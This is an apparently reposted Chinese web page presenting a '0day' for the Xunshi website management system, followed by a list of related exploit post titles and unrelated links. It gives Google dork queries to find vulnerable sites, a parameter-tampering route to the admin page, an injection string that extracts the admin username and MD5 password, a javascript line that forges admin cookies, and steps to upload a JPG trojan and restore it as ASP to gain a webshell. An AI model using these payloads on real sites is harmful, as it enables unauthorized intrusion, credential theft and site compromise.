讯时网站管理系统通杀0DAY漏洞
来源:互联网 发布:在淘宝买发票暗号是啥? 编辑:程序博客网 时间:2024/04/30 10:50
在谷歌搜索 inurl: admin/admin_news_pl_view.asp 打开搜索到的网址或者输入 inurl:news_more.asp?lm2=
然后修改成 admin/admin_news_pl_view.asp?id=1 或者 admin/admin_news_pl_view.asp?id=2 或者 admin/admin_news_pl_view.asp?id=3
只要显示错误就一直打3,4,5......
找到管理员和32位MDB密码后破解MDB密码,然后进后台 admin/admin_index.asp 输入破解好的用户名和密码直接进系统
另外还可以这样子进后台:
|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username=' // 得到管理员用户和MD5密码
cookies进后台
javascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));
在系统里面有上传图片的功能,上传后,再用备份恢复数据库的功能来恢复上传好的JPG木马成 ASP格式,搞定。
- 讯时网站管理系统通杀0DAY漏洞
- 漏洞搜集:mofei_new 新闻管理系统通杀0day
- CMSDJPHP 七禧舞曲管理系统cookies欺骗漏洞 0day
- 传信网络独立开发网站源码0day漏洞
- actcms网站管理系统漏洞0day
- 0day漏洞
- 0DAY漏洞
- # 0day漏洞_ETERNALBLUE_windows7X64
- PHP168整站系统0DAY漏洞预警
- 牧星 php 网站信息管理系统 0day
- 随缘php企业网站管理系统V2.0 shownews.php注入漏洞
- 动易网站管理系统删除任意文件漏洞
- 智睿学校网站管理系统VER1.5.7后台漏洞
- evoArticles网站管理系统任意文件上传漏洞
- Phpcms V9 网站管理系统 SQL 盲注入漏洞
- BOSSI 公司(企业)网站管理系统注入&上传漏洞利用
- whmcs主机管理系统0day
- 0day漏洞,0day拦截
- java保存日志到本地文本文件
- HDU 2602
- spring security 3.1注册后自动登录
- android java开发 第一天 之熟悉eclipse adt
- 建模与设计
- 讯时网站管理系统通杀0DAY漏洞
- 向VS的Output窗口输出调试信息
- asp.net获取当前时间
- 京东选择.Net架构原因与.Net架构的优劣解析
- .vimrc Vim的配置文件及配置方法
- iOS Human Interface
- [转]浏览器工作原理
- 判断当前是否是锁屏状态
- lex